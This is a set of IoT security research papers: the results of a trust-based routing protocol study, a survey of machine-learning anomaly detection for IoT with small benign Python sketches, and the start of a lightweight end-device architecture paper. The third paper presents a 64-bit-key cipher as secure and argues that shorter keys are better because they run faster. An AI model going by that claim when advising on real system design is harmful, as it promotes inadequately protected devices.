and 38% higher than ELPFR-MC. The impact of varying buffer size on average latency is
shown in Fig. 4. With increasing buffer size, the latency increases as packets spend
more time in the buffer. The average delay in delivering packets for ES_T_CAFE is
observed to be 2344.67 s.
Fig. 2 Node’s residual energy versus buffer size (ELPFR-MC, T_CAFE, ES_T_CAFE)

Fig. 3 Messages dropped versus buffer size (ELPFR-MC, T_CAFE, ES_T_CAFE)

Fig. 4 Average latency versus buffer size (ELPFR-MC, T_CAFE, ES_T_CAFE)



Fig. 5 Delivery probability versus TTL (ELPFR-MC, T_CAFE, ES_T_CAFE)

Fig. 6 Node’s residual energy versus TTL (ELPFR-MC, T_CAFE, ES_T_CAFE)

The effect of changing the packet’s time to live is then observed on the simulation
metrics, as shown in Figs. 5, 6, 7 and 8. Figure 5 shows that raising the value of
message TTL results in a drop in the probability of message delivery. This is due to the
fact that the buffer is more occupied with increased message TTL, as the messages
tend to live longer, thus raising the probability of messages getting dropped. The
average probability of message delivery for ES_T_CAFE is 0.3934, which is 8.42%
better than T_CAFE and 18% higher than ELPFR-MC. The residual
energy at the end of the simulation drops with increasing TTL, as shown in Fig. 6. As the
messages spend a longer time in the buffer, the node’s energy is wasted in dropping
them later on to free the buffer. The average residual energy for ES_T_CAFE is
30261.51 J, which is the highest.
From Fig. 7, it can be observed that the count of packets getting dropped increases
with growing TTL. The messages stay in the buffer for a larger period of time, enhancing
their chances of getting dropped, consistent with the drop in delivery probability shown in Fig. 5. The average count of dropped
Fig. 7 Messages dropped versus TTL (ELPFR-MC, T_CAFE, ES_T_CAFE)

Fig. 8 Average latency versus TTL (ELPFR-MC, T_CAFE, ES_T_CAFE)

messages for ES_T_CAFE is 5.42% lower than T_CAFE and 9.1% lower than
ELPFR-MC. The average delay in packet delivery increases with increasing TTL.
Figure 8 demonstrates that the observed delay for ES_T_CAFE is around 3414.97 s.

5 Conclusion

An energy- and space-efficient secure routing protocol for OppIoT (called ES_T_
CAFE) is proposed in this paper. ES_T_CAFE depends on the node’s leftover energy,
free buffer size and trust-based probability of packet delivery for making message
forwarding decisions. Including the parameters of space and energy enhances the
efficiency of routing protocols as the devices involved are usually constrained in terms
of storage space and battery capacity. Simulation results prove that ES_T_CAFE
outperforms T_CAFE and ELPFR-MC in terms of node’s residual energy, messages
dropped, message delivery probability and average latency. In future, the authors
plan to investigate the impact of message encryption on the proposed scheme.
References

1. Atzori, L., Iera, A., & Morabito, G. (2010). The internet of things: A survey. Computer Net-
works, 54(15), 2787–2805.
2. Pelusi, L., Passarella, A., & Conti, M. (2006). Opportunistic networking: Data forwarding in
disconnected mobile ad hoc networks. IEEE Communications Magazine, 44(11), 134–141.
3. Guo, B., Zhang, D., Wang, Z., Yu, Z., & Zhou, X. (2013). Opportunistic IoT: Exploring the
harmonious interaction between human and the internet of things. Journal of Network and
Computer Applications, 36(6), 1531–1539.
4. Sicari, S., Rizzardi, A., Grieco, L. A., & Coen-Porisini, A. (2015). Security, privacy and trust
in internet of things: The road ahead. Computer Networks, 76, 146–164.
5. Wu, Y., Zhao, Y., Riguidel, M., Wang, G., & Yi, P. (2015). Security and trust management in
opportunistic networks: A survey. Security and Communication Networks, 8(9), 1812–1827.
6. Chen, R., Guo, J., & Bao, F. (2016). Trust management for SOA-based IoT and its application
to service composition. IEEE Transactions on Services Computing, 9(3), 482–495.
7. Kandhoul, N., Dhurandher, S. K., & Woungang, I. (2019). T_CAFE: A trust based security
approach for opportunistic IoT. IET Communications.
8. Dhakne, A. R., & Chatur, P. N. (2017). Detailed survey on attacks in wireless sensor network.
In Proceedings of the International Conference on Data Engineering and Communication
Technology (pp. 319–331). Springer.
9. Gao, S., Zhang, L., & Zhang, H. (2010). Energy-aware spray and wait routing in mobile
opportunistic sensor networks. In 2010 3rd IEEE Intl. Conference on Broadband Network and
Multimedia Technology (pp. 1058–1063). IEEE.
10. Chilipirea, C., Petre, A.-C., & Dobre, C. (2013). Energy-aware social-based routing in oppor-
tunistic networks. In 2013 27th International Conference on Advanced Information Networking
and Applications Workshops (pp. 791–796). IEEE.
11. Duan, J., Gao, D., Yang, D., Foh, C. H., & Chen, H.-H. (2014). An energy-aware trust derivation
scheme with game theoretic approach in wireless sensor networks for IoT applications. IEEE
Internet of Things, 1(1), 58–69.
12. Sharma, D. K., Dhurandher, S. K., Woungang, I., Arora, J., & Gupta, K. (2016). History-based
secure routing protocol to detect blackhole and greyhole attacks in opportunistic networks. In
Recent Advances in Communications and Networking Technology (Vol. 5, No. 2, pp. 73–89).
13. Krishna, M. B., & Lorenz, P. (2017). Delay aware secure hashing for opportunistic message
forwarding in internet of things. In Globecom Workshops, 1–6. IEEE.
14. Dhurandher, S. K., Kumar, A., & Obaidat, M. S. (2017). Cryptography-based misbehaviour
detection and trust control mechanism for opportunistic network systems. IEEE Systems Jour-
nal, 12(4), 3191–3202.
15. Borah, S. J., Dhurandher, S. K., Woungang, I., Kandhoul, N., & Rodrigues, J. J. C. (2018). An
energy-efficient location prediction-based forwarding scheme for opportunistic networks. In
IEEE ICC, 1–6.
16. Kandhoul, N., & Dhurandher, S. K. (2019). An asymmetric RSA based security approach for
opportunistic IoT. In WIDECOM (pp. 47–60). Milan, Italy: Springer.
17. Keränen, A., Ott, J., & Kärkkäinen, T. (2009). The one simulator for DTN protocol evaluation.
In Proc. of the 2nd International Conference on Simulation Tools and Techniques (pp. 1–10).
Institute for Computer Sciences, Social-Informatics and Telecommunications Engineering.
18. Crawdad haggle dataset. https://crawdad.org/uoi/haggle/20160828/one. Accessed: 2019-10-18.
A Survey on Anomaly Detection
Techniques in IoT

Priya Sharma and Sanjay Kumar Sharma

Abstract When small everyday 'things' or objects are augmented with computing
capabilities, and a connection is created between them, a network of Internet
of Things (IoT) devices is formed. Since IoT devices have reached home users as well, it
has become crucial to maintain the integrity of these devices and prevent any unethical
mishappenings arising from security flaws. Many researchers have proposed
techniques for this purpose, from understanding propagation behavior and
influential factors to developing frameworks like software-defined anything (SDx) in
order to detect and mitigate security attacks on IoT devices. In this paper, a survey
of such techniques published in the decade 2010-2020 is presented, with a focus on
recent publications and a comparative study of all the mentioned sources. The aim
of this survey is to motivate researchers in the area of IoT and its security and to help
them understand the current trend and what the future holds for development in the
area.

Keywords Internet of Things · IoT · Anomaly detection · Cyber security ·
Machine learning · Optimization

1 Introduction

The era of the Internet of Things (IoT) has arrived; every little item in the household is
being converted to a digital alternative, equipped with a processor, connected to the
other items, performing in sync, and providing ease to humankind. The Internet offers
global communication; hence, all of these devices can be accessed from anywhere in
the world. The technology behind IoT has been growing at a swift pace for the past
decade, but recently, with the advancement in technology and faster communication
with efficient bandwidth control, the pool of IoT devices has seen a burst in growth [1].
An estimated twenty-two billion IoT devices are currently connected to the Internet,
a number that is only
P. Sharma (B) · S. K. Sharma


School of Information and Communication Technology, Gautam Buddha University, Greater
Noida, India


going to increase as time passes and is expected to pass the fifty billion mark in 2030
[2].
IoT devices can broadly be defined under three categories:
a. Big Things
Big Things are not big in size, but in the complexity of their design and in
how they work. For instance, a telecom company manages its big IoT
devices, such as base stations and mobile station controllers; all of these devices
are connected to power outlets. They are also connected to the internet, without
the need for bandwidth control, and there are thousands of parameters to be
controlled in this scenario.
b. Small Things
Small IoT devices are the smaller, simpler things in terms of complexity that are
used every day by the average user and are connected to the internet. This
category contains mostly sensors and small devices that can run on battery
power and are supposed to have efficient bandwidth control, as most of the time
these devices use a subscriber identity module or SIM card [3]. For instance,
a smart bulb or tube light at home: these kinds of devices follow the set-and-gate
rule and do not have thousands of parameters to work on.
c. Non-IP Things
These are the things that are called IoT but are not really IoT, because they are
not connected to the internet. These are things like ZigBee, Z-Wave, and BLE;
all of these are IoT protocols that do not use the internet, but the devices become
IoT devices with the help of a gateway. This adds a layer of complexity, but it is
still much less than that of the big things. The data model is just as simple as that
of the small things.
As internet applications grow day by day, their security against intrusion
has become a significant issue [4]. IoT devices do not have a glorious record in terms
of security. IoT devices face certain challenges when it comes to security:
as they are heterogeneous devices, it is complex to form a single secure mechanism
that can be implemented by all of the devices; instead, each individual device requires
a unique security mechanism. The second challenge comes from the very advantage
of IoT devices itself, i.e., the interconnectivity; since all of the devices are connected
with each other, if one of them gets compromised, it is relatively easy to intrude into
other devices as well.
As the world moves forward with the implementation of smart cities and
interconnected devices, correct maintenance practices become essential [5]. Security
mechanisms have become a crucial part of the research on such devices; therefore, a secure
IoT infrastructure should be created which provides protection from cybercrime and
guards the vulnerabilities of the devices. In a smart city, data is
of utmost value, even more than money; therefore, the IoT security infrastructure
should be built in such a way that even if it gets compromised, it has the ability to
recover, and for such purposes, several techniques have been exploited. In
this paper, a survey of these techniques is presented. The key aspect of

this paper is the realization that anomaly detection has provided more
protection than other machine learning-based techniques in terms of IoT security.

1.1 Anomaly Detection

The anomaly-based technique follows an item's behavior; the observations made
on the behavior of an item/object are recorded and learned. If, for any reason, a
change is observed in the behavior of the item/object, it is marked as an anomaly or
a deviation, which is not supposed to be in the system and hence serves as an
alarm. It is therefore also known as a profile-based detection technique. The
anomaly-based detection technique detects these unknown patterns and reports them
[6].
As Fig. 1 shows, the requests from the devices are analyzed at the server level,
and when a service request is detected as an outlier/abnormal request, the request
is declined and an alarm is sent to the administrator. The flow chart of the working
of anomaly detection is shown in Fig. 2.
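A minimal sketch of this profile-based idea is given below: a statistical profile of normal behaviour is learned from past observations, and a new observation is flagged when it deviates too far from that profile. The z-score threshold and the example readings are assumptions for illustration, not part of any surveyed work.

```python
# Minimal sketch of profile-based (anomaly-based) detection: learn the normal
# behaviour of a device, then flag observations that deviate too far from the
# learned profile. The z-score threshold of 3 is an illustrative assumption.

import numpy as np

def build_profile(normal_observations):
    """Learn a simple statistical profile (mean and std) of normal behaviour."""
    data = np.asarray(normal_observations, dtype=float)
    return data.mean(), data.std()

def is_anomalous(observation, profile, threshold=3.0):
    """Flag the observation if it deviates more than `threshold` std devs."""
    mean, std = profile
    if std == 0:
        return observation != mean
    return abs(observation - mean) / std > threshold

if __name__ == "__main__":
    # e.g. requests per minute seen from a smart bulb during normal operation
    profile = build_profile([4, 5, 6, 5, 4, 6, 5])
    print(is_anomalous(5, profile))    # False: consistent with the profile
    print(is_anomalous(250, profile))  # True: raise an alarm to the administrator
```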

Fig. 1 Anomaly detection [6]



Fig. 2 Flow chart of anomaly detection [7]

This paper is arranged as follows: Related work is described
in Sect. 2. Section 3 formulates a comparison in which the various machine
learning algorithms are analyzed. Finally, the conclusion is given in Sect. 4.

2 Literature Review

In this section, some of the research work done in the IoT security area is
reviewed; the aim is to motivate researchers in the area of IoT and
its security and to help them understand the current trend and what the future holds for
development in the area.
In the research done by Hasan et al. [8], they have used various machine learning
techniques like logistic regression (LR), support vector machine (SVM), decision
tree (DT), random forest (RF), and artificial neural network (ANN), and performed
analysis of their accuracy in terms of secure infrastructure for IoT devices. For each
of the techniques, they have reached more than 98% accuracy.
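As an illustration of this kind of comparison (not the authors' code or dataset), the sketch below trains the same family of scikit-learn classifiers on a stand-in labelled dataset and reports their accuracy; in practice X and y would be features and normal/attack labels extracted from IoT traffic.

```python
# Illustrative comparison of the classifiers mentioned above with scikit-learn.
# The synthetic dataset below is a stand-in, not the authors' data.

from sklearn.datasets import make_classification
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LogisticRegression
from sklearn.svm import SVC
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import accuracy_score

X, y = make_classification(n_samples=2000, n_features=20, random_state=0)  # stand-in data
X_tr, X_te, y_tr, y_te = train_test_split(X, y, test_size=0.3, random_state=0)

models = {
    "LR": LogisticRegression(max_iter=1000),
    "SVM": SVC(),
    "DT": DecisionTreeClassifier(),
    "RF": RandomForestClassifier(n_estimators=100),
}
for name, model in models.items():
    model.fit(X_tr, y_tr)
    print(name, accuracy_score(y_te, model.predict(X_te)))
```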
Liu et al. [9] proposed a state of detection based on 'ON' and 'OFF', meaning that
a malicious attack can be performed on an IoT device while the device is in its
sleep mode. They also noticed that after getting attacked, the devices

do not change their behavior and perform the same tasks in an ordinary manner, so it is
challenging to detect compromised devices.
Diro et al. [10], proposed a fog-to-things architecture, which is based on deep and
shallow neural networks, and they performed their experiment on an open-source
database. Their experiment was based on detecting anomalies for the four test classes,
and they achieved 98.27% accuracy in their deep neural network model and 96.75%
accuracy in their shallow neural network model.
Hodo et al. [11], performed a threat analysis using an artificial neural network
(ANN), the main focus of the analysis performed by them was to classify normal and
threat patterns in an IoT network. They performed their experiment in a simulated
IoT environment, and achieved an accuracy of 99.4%, and they verified the fact that
IoT based on ANNs can successfully detect DDoS/DoS attacks.
Pacheco et al. [12], proposed a framework for threat analysis made up of four
different layers, devices, network, service, and application layer. Their experiment
claims to identify potential attacks and provide a method of mitigation from the
compromised system and perform full recovery. Their classification model reached
an accuracy of 98% for known attacks and 97.4% for unknown attacks.
Golomb et al. [13], proposed a new framework, CIoTA: Collaborative IoT
anomaly detection via blockchain. This framework is based on the concept of
blockchain, which allows it to perform distributed anomaly detection. Their exper-
iment was performed in a simulated environment; the overhead of their system
reached only up to 6.5%, and it was able to withstand all of the exploitation experiments
performed on it.
Alrashdi et al. [14], worked on the problem of security issues in smart city IoT
devices, and proposed an anomaly based random forest classifier to detect compro-
mised IoT devices at distributed fog nodes. Their experiment achieved an accuracy
rate of 99.34%.
Garg et al. [15] performed analysis on a clustering technique used in IoT devices,
density-based spatial clustering of applications with noise (DBSCAN),
which is used to detect anomalies. However, they discovered that DBSCAN suffers
from two issues: parameter selection and finding the correct nearest neighbor. They
provided a multi-stage model using the Boruta algorithm to capture the most relevant
feature set and the firefly algorithm to correctly find the centroid.
Their experiment yielded an accuracy of 96.23%.
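The following sketch illustrates the basic DBSCAN idea referred to above (without the Boruta and firefly stages of [15]): points that DBSCAN labels as noise (label -1) are treated as anomalies. The eps and min_samples values are assumptions, and tuning them is precisely the parameter-selection issue the authors point out.

```python
# Illustrative DBSCAN-based anomaly detection: noise points (label -1) are
# treated as anomalies. Data, eps and min_samples are assumptions.

import numpy as np
from sklearn.cluster import DBSCAN

rng = np.random.default_rng(0)
normal = rng.normal(loc=0.0, scale=0.5, size=(200, 2))   # dense normal traffic
outliers = rng.uniform(low=-6, high=6, size=(5, 2))      # scattered anomalies
X = np.vstack([normal, outliers])

labels = DBSCAN(eps=0.5, min_samples=5).fit_predict(X)
anomaly_idx = np.where(labels == -1)[0]
print(f"{len(anomaly_idx)} points flagged as anomalous")
```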
Luo and Nagarajan [16], introduced auto-encoder neural networks into the wire-
less sensor networks (WSNs) in order to solve the issue of elusive nature of anoma-
lies and the volatility present in ambient environments. Their experiment reduced
the overhead and the computational load by moving this task from the IoT device to
the cloud itself. They achieved higher accuracy with lower false positive rates than
their existing counterparts. Their experiment also claims to be adaptive to the new
changes made in the network.
Nguyen et al. [17], presented a new framework for IoT security, named as DÏoT,
which is an autonomous self-learning distributed system, which can be used to detect
compromised IoT devices in a network. This framework does not require human inter-
vention and is able to successfully detect anomalies caused by malicious adversaries.

It employs a federated learning approach and is able to adapt to new and unknown
attacks. Their experiment yielded a high accuracy rate of 95.6% with no false alarms
in a real-world situation.

3 Analysis of Literature Work

Data can be collected from various sources and can be mined as well, but knowledge
discovery alone does not yield enough results to support a controlling action.
This is where anomaly detection comes into the picture: IoT sensors can capture rich
information, and this additional information provides enough data to classify an action as
anomalous or normal [18, 19]. In this section, the literature review is compared
in Table 1, and an empirical analysis is provided afterward.
It has been found that most of the research done in the area of security improvement
using anomaly detection in IoT devices is based on machine learning algorithms
and their various classifiers, and the most influential application is 'smart cities.'
The research papers selected are from the years 2014-2020. The technical
insight has been reviewed in Sect. 2 in order to give the reader a feel for
this field of research. The comparison below provides the reader with the details
of techniques that are actively being improved for anomaly detection in IoT devices,
so that an informed decision can be made about where effort should be invested
in order to overcome the existing challenges. Considering the potential applications

Table 1 Summary of literature review
# | Author | Technique | Application area | Evaluation scheme | Accuracy rate
1 | Hasan et al. [8] | ML algorithms | Smart cities | Accuracy | 98%
2 | Liu et al. [9] | Set/gate | Smart cities | Error rate | –
3 | Diro et al. [10] | Neural network | Smart cities | Accuracy | 98.27%
4 | Hodo et al. [11] | Artificial neural network | Network | Accuracy | 99.4%
5 | Pacheco et al. [12] | Threat analysis | Network | Accuracy | 97.4%
6 | Golomb et al. [13] | CIoTA or blockchain | Smart cities | Overhead | <6.5%
7 | Alrashdi et al. [14] | Random forest | Smart cities | Accuracy | 99.34%
8 | Garg et al. [15] | DBSCAN | Network | Accuracy | 96.23%
9 | Luo and Nagarajan [16] | Neural networks | Ambient environments | Error rate | –
10 | Nguyen et al. [17] | DÏoT | Network | Accuracy | 95.6%

of IoT devices in the future, it is a crucial requirement not only to make such highly
secure frameworks for upcoming IoT devices but also to make advancements so
that the current generation of IoT devices can be upgraded without requiring the user
to remove the devices from the network for a considerable amount of time.

4 Conclusion

As IoT devices have seen a burst in the growth of both creation and usage, it has
become a crucial requirement to maintain the integrity of these devices and prevent
any unethical mishappenings arising from security flaws. According to some
researchers, securing the IoT devices' access points and addressing the weaknesses
would solve the problem, but IoT devices need to be secured as whole units
and should be able to recover from a compromised situation. For that purpose, this
paper presented a survey of such techniques, with a comparative study of all the
mentioned sources. The aim of this survey is to motivate researchers in the area
of IoT and its security and to help them understand the current trend and what the future
holds for development in the area. As has been analyzed, security enhancements
are being made with the help of machine learning techniques to improve the
anomaly detection of IoT devices, since the sensors present in IoT devices capture rich
information, useful enough to make a correct classification of normal or anomalous
behavior. A future application in this area could be to adjust the
security infrastructure such that even if the attacker learns the sensor information and
gains enough access to launch a replay attack, the IoT device is able to mitigate and
recover successfully. This situation might be solved with the help of an MTD (moving
target defense) strategy, making it very difficult to perform analysis on the IoT device's database.

References

1. Lueth, K. L. (2014). Why the internet of things is called internet of things: Definition, history,
disambiguation. IoT Analytics, 19.
2. shorturl.at/stPX2. Accessed 26 Dec 2020.
3. Alzubi, J. A., Manikandan, R., Alzubi, O. A., Qiqieh, I., Rahim, R., Gupta, D., & Khanna,
A. (2020). Hashed Needham Schroeder Industrial IoT based cost optimized deep secured data
transmission in cloud. Measurement, 150, 107077.
4. Singh Bhati, N., Khari, M., Garcia-Diaz, V., & Verdu, E. (2020). A review on intrusion detection
systems and techniques. International Journal of Uncertainty, Fuzziness and Knowledge-Based
Systems.
5. Bhati, B. S., & Rai, C. S. (2020). Ensemble based approach for intrusion detection using extra
tree classifier. Intelligent computing in engineering (pp. 213–220). Singapore: Springer.
6. Bhati, B. S., Chugh, G., Al-Turjman, F., & Bhati, N. S. (2020). An improved ensemble based
intrusion detection technique using XGBoost. Transactions on Emerging Telecommunications
Technologies, e4076.
7. Gurina, A., & Eliseev, V. (2019). Anomaly-based method for detecting multiple classes of
network attacks. Information, 10(3), 84.

8. Hasan, M., Islam, M. M., Zarif, M. I. I., & Hashem, M. M. A. (2019). Attack and anomaly
detection in IoT sensors in IoT sites using machine learning approaches. Internet of Things, 7,
100059.
9. Liu, X., Liu, Y., Liu, A., & Yang, L. T. (2018). Defending ON–OFF attacks using light
probing messages in smart sensors for industrial communication systems. IEEE Transactions
on Industrial Informatics, 14(9), 3801–3811.
10. Diro, A. A., & Chilamkurti, N. (2018). Distributed attack detection scheme using deep learning
approach for internet of things. Future Generation Computer Systems, 82, 761–768.
11. Hodo, E., Bellekens, X., Hamilton, A., Dubouilh, P. L., Iorkyase, E., Tachtatzis, C., & Atkinson,
R. (2016). Threat analysis of IoT networks using artificial neural network intrusion detec-
tion system. In 2016 International Symposium on Networks, Computers and Communications
(ISNCC) (pp. 1–6). IEEE.
12. Pacheco, J., & Hariri, S. (2018). Anomaly behavior analysis for IoT sensors. Transactions on
Emerging Telecommunications Technologies, 29(4), e3188.
13. Golomb, T., Mirsky, Y., & Elovici, Y. (2018). CIoTA: collaborative IoT anomaly detection via
blockchain. arXiv preprint arXiv:1803.03807.
14. Alrashdi, I., Alqazzaz, A., Aloufi, E., Alharthi, R., Zohdy, M., & Ming, H. (2019). Ad-iot:
Anomaly detection of iot cyber attacks in smart city using machine learning. In 2019 IEEE 9th
Annual Computing and Communication Workshop and Conference (CCWC) (pp. 0305–0310).
IEEE.
15. Garg, S., Kaur, K., Batra, S., Kaddoum, G., Kumar, N., & Boukerche, A. (2020). A multi-stage
anomaly detection scheme for augmenting the security in IoT-enabled applications. Future
Generation Computer Systems, 104, 105–118.
16. Luo, T., & Nagarajan, S. G. (2018). Distributed anomaly detection using autoencoder neural
networks in wsn for iot. In 2018 IEEE International Conference on Communications (ICC)
(pp. 1–6). IEEE.
17. Nguyen, T. D., Marchal, S., Miettinen, M., Fereidooni, H., Asokan, N., & Sadeghi, A. R.
(2019). DÏoT: A federated self-learning anomaly detection system for IoT. In 2019 IEEE 39th
International Conference on Distributed Computing Systems (ICDCS) (pp. 756–767). IEEE.
18. Ukil, A., Bandyoapdhyay, S., Puri, C., & Pal, A. (2016). IoT healthcare analytics: The
importance of anomaly detection. In 2016 IEEE 30th international conference on advanced
information networking and applications (AINA) (pp. 994–997). IEEE.
19. Raj, R. J. S., Shobana, S. J., Pustokhina, I. V., Pustokhin, D. A., Gupta, D., & Shankar, K.
(2020). Optimal feature selection-based medical image classification using deep learning model
in internet of medical things. IEEE Access, 8, 58006–58017.
Novel IoT End Device Architecture
for Enhanced CIA: A Lightweight
Security Approach

Prateek Mishra, Sanjay Kumar Yadav, Ravi Kumar Sachdeva,


and Rajesh Tiwari

Abstract Security is a burning issue in wearable IoT end devices. The exponential
growth of IoT has delegated processing and storage from the cloud to wearable end
devices. Due to the resource-constrained nature of IoT end devices, balancing light weight
and security is a challenge. In this paper, light weight within IoT
end devices is ensured by shifting virtualization to the fog node and implementing the
lightweight secure internet of things (SIT) cryptographic algorithm using the Arduino
IDE over ESP32. A stable chain of trust creates a robust trusted execution environment
(TEE) to ensure security within IoT devices. Inter-IoT-device security is
ensured by an encrypted one time password (OTP) using the SIT algorithm. The SIT algorithm
is lightweight since it uses a key size of 64 bits and 22 bytes of run-time memory,
with a total encryption and decryption execution time of 0.375 ms, and is optimal
for our proposed lightweight IoT end device architecture.

Keywords Encrypted one time password · Lightweight SIT algorithm · Stable
chain of trust · Wearable IoT end devices

1 Introduction

The Internet of Things (IoT) architecture comprises the cloud core, fog nodes and end
devices [1]. Wearable end devices have the least processing and storage capability and
communicate with the cloud core via a fog node. With the growth of IoT systems, processing and
storage have been delegated from the cloud to the edge, which has increased attacks on
end devices [11], resulting in over-architectured and vulnerable IoT end devices.
A typical Type-1 hypervisor based IoT end device architecture [15] is shown in

P. Mishra (B) · S. K. Yadav


Sam Higginbottom University of Agriculture, Technology and Science, Allahabad, India
R. K. Sachdeva
Asia Pacific Institute of Information Technology(APIIT) SD Indıa, Panipat, India
R. Tiwari
United College of Education, Greater Noida, India


Fig. 1 Type-1 hypervisor based end device with high attack volume. Source: IJRTE, ISSN 2277-3878, Volume 8, Issue 6, March 2020, p. 5712

Fig. 1. Since the hypervisor is at level 1, this type of device is known as a Type-1
hypervisor based IoT end device. This architecture comprises bare metal at level
0 for processing and storage. A thin software layer, the hypervisor at level 1, creates
virtualization, monitors virtual machine behavior, and provides temporal and
spatial isolation at run time. A virtual machine comprises guest OS(s) at level 2
and virtual applications at level 3. An inter virtualization extension technology (VTx)
implements sharing of processors and footprints among the VMs [8]. All the trusted hardware
and software within the IoT end device form the trusted computing base (TCB)
and hence the chain of trust (CoT), followed by the trusted execution environment (TEE), to
establish guaranteed security in terms of confidentiality, integrity and authenticity
(CIA).
Bulky TCB components in wearable devices incur excess weight and complexity,
followed by more bugs, vulnerabilities and overheads. The more area exposed [2,
7] to the untrusted external world, the less secure the device, leading to a breach of trust and
therefore a weak TEE [11]. The protection of the TCB is ensured by minimum size and minimum
complexity; hence TCB minimization is mandatory for lightweight and secured IoT
end devices [9]. As shown in Fig. 1, the higher layers of the IoT end device architecture
are the easiest target for threats, with a high attack volume achievable with minimum effort and
minimum resources due to their direct interaction with the external untrusted world, whereas
the lower layers of IoT end devices require huge effort and resources [3] and are thus difficult
to attack due to the uninterrupted secure boot process.
Therefore, in our proposed architecture, a lightweight micro (µ)-hypervisor [4] has
been implemented on the fog node to shift virtual machines from the IoT end devices
to the fog nodes in order to minimize the TCB components, resulting in secured
IoT end devices. The lightweight SIT algorithm is implemented due to its least possible code

size since IoT end devices are characterized by low storage, low-runtime memory
and requirements of least execution time. Thus, lightweight and trusted components
are having less complexity hence minimum or no bugs and also support minimum
latency so as to ensure security in terms of confidentiality, integrity, authenticity
(CIA). The external trusted world devices must only be allowed to interact with
trusted IoT edge devices due to inevitable security requirements. Due to resource
limitations in the IoT end devices we need lightweight TCB components in terms of
minimum footprint, minimum latency [9, 10].
The objective of this paper is to propose a novel lightweight architecture with
the implementation of a lightweight cryptographic algorithm so as to enhance CIA.
The rest of the paper is organized as follows: Sect. 2 summarizes the literature review.
Section 3 discusses the need for a lightweight cryptographic algorithm. Sections 4 and 5
present the novel lightweight architecture and its functionality. Section 6 presents results
and discussion. Section 7 concludes the paper.

2 Literature Review

• IoT end device security holes are not yet properly understood [12].
• The IoT device architecture in [5] claims to be lightweight but is over-architectured
compared to our proposed one due to a hypervisor size of approximately 13 K and hypervisor
based virtualization at the IoT end devices. It has no remote updates, no secured
terminal access, no provision against internal bugs and vulnerabilities within the TCB,
and only partial confidentiality, integrity and authenticity.
• The IoT device architectures in [6, 7, 13] are over-architectured due to no lightweight
considerations and hence unsecured. These architectures have no provision against side
channel attacks and offer partial confidentiality and integrity but no authenticity.
• The security mechanisms evaluated in [19] show that key size, number of rounds
and word size increase the execution time of a cryptographic algorithm.
• The smaller the key size of a cryptographic algorithm, the faster the
algorithm. The schemes in [16-19] use a 128-bit key size, which is sufficient to slow
down the execution process.
• Usman et al. [14] mention that the implementation of conventional, computationally
expensive security algorithms will hinder the performance of
wearable devices.

3 The Need of Lightweight Cryptographic Algorithm

An optimal lightweight cryptographic algorithm is necessary to develop a secure
and lightweight IoT architecture. Our proposed architecture uses the secure internet
of things (SIT) [14] symmetric key block cipher algorithm. The encryption and
decryption in the SIT algorithm are composed of five rounds and hence require five unique

Table 1 Comparisons of cryptographic algorithms


Cipher Key size (bits) Code size (bytes) RAM (bytes) Cycles (enc) Cycles (dec)
AES [16] 128 1570 – 2739 3579
HIGHT [17] 128 5672 – 2964 2964
IDEA [17] 80 596 – 2700 15393
KLEIN [18] 80 1268 18 6095 7658
TEA [18] 128 648 24 7408 7539
PRINCE [18] 128 1574 24 3253 3293
SIT [14] 64 826 22 3006 2984

keys. These keys are used to encrypt and decrypt communication between the IoT edge
and the fog node.
Table 1 shows the comparison between various cryptographic algorithms. Key
sizes are in bits; code sizes and RAM are in bytes. The cycles involve encryption
(enc), decryption (dec) and key expansion to secure the keys involved in encryption
and decryption. As mentioned in the table, SIT uses optimal resources: a 64-bit key, 826 bytes
of code and 22 bytes of RAM. Its encryption and decryption are also faster than those of
the other cryptographic algorithms. Thus, SIT is optimal for wearable IoT devices.
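The cycle counts in Table 1 can be turned into rough execution times once a clock frequency is assumed. The short sketch below does this for a hypothetical 16 MHz microcontroller clock; under that assumption SIT's cycle counts correspond to roughly 0.188 ms for encryption and 0.187 ms for decryption, which is consistent with the timings reported in Sect. 6.

```python
# Back-of-the-envelope conversion of the cycle counts in Table 1 into
# execution times, assuming a 16 MHz microcontroller clock (an assumption,
# not a figure stated in the paper).

CLOCK_HZ = 16_000_000  # assumed clock frequency

ciphers = {
    "AES":    (2739, 3579),
    "PRINCE": (3253, 3293),
    "SIT":    (3006, 2984),
}
for name, (enc_cycles, dec_cycles) in ciphers.items():
    enc_ms = enc_cycles / CLOCK_HZ * 1000
    dec_ms = dec_cycles / CLOCK_HZ * 1000
    print(f"{name}: enc {enc_ms:.3f} ms, dec {dec_ms:.3f} ms")
```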

4 Novel Lightweight Architecture

The proposed novel architecture comprises three components: (i) fog node, (ii) web
interface and (iii) IoT end device. The architecture is described in Sects. 4.1, 4.2
and 4.3.

4.1 Trusted Fog Nodes with CoT and TEE

As shown in Fig. 2, the fog node has (i) bare metal at the bottom, with one-time
memory holding the BL with RPK. When powered on, the boot process ensures CIA. The
authentication from lower to upper layers continues till all the software is uploaded;
thus a chain of trust (CoT) is built and hence a robust trusted execution environment (see R.
TEE in Fig. 2) is established. (ii) The µ-visor (see Fig. 2) lies in the middle, between bare
metal and virtual machine. The µ-visor is the thinnest software layer, smaller in terms
of lines of code, consumes fewer resources compared to traditional hypervisors,
and is most feasible for wearable lightweight IoT end devices. The µ-visor creates virtual
machines (VMs) at the top layer and monitors VM behavior. The µ-visor also provides
spatial and temporal separation at run time through the inter virtualization extension
(VTx). If a VM causes any spoilage, the µ-visor blocks that VM and issues an alert for further

Fig. 2 Fog node with µ-visor and TEE

necessary actions. Additionally, here the µ-visor generates a one time password (OTP)
and encrypts the OTP.
The encrypted OTP is sent to an IoT end device via the transceiver when the end device tries
to connect with the fog node. Every VM consists of a signature (see Fig. 2) to register new
IoT end devices and connect already registered IoT end devices. After registration,
every fog node will have the user id and password along with the device id of all its end
devices. Every IoT end device will also store its own user id and password along
with its device id. If an already registered IoT end device wants to connect to the fog node,
that end device sends its user id and password along with its device id to the fog
node. The fog node thereafter searches for the respective user id and password along with
the device id in its own database. If the search is successful, the fog node issues a one time password
(OTP) to the respective IoT end device. After OTP verification, the respective IoT end
device gets connected to the fog node. Once the connection is established, the VM starts
receiving data from that IoT end device. To identify the data source, the received data is then
given to the data fragmentation and device identification block (see Data Frag. & Device ID in
Fig. 2) for (1) identification of the device using frames coming from the respective IoT
end device (see Data Frame in Fig. 3-6) and (2) identification of the device using the device
ID (see Device ID in Fig. 3). The data decryption block (see D. DEC. in Fig. 4) then
decrypts the data encrypted at the IoT end so as to get the original data. Finally, the data processing
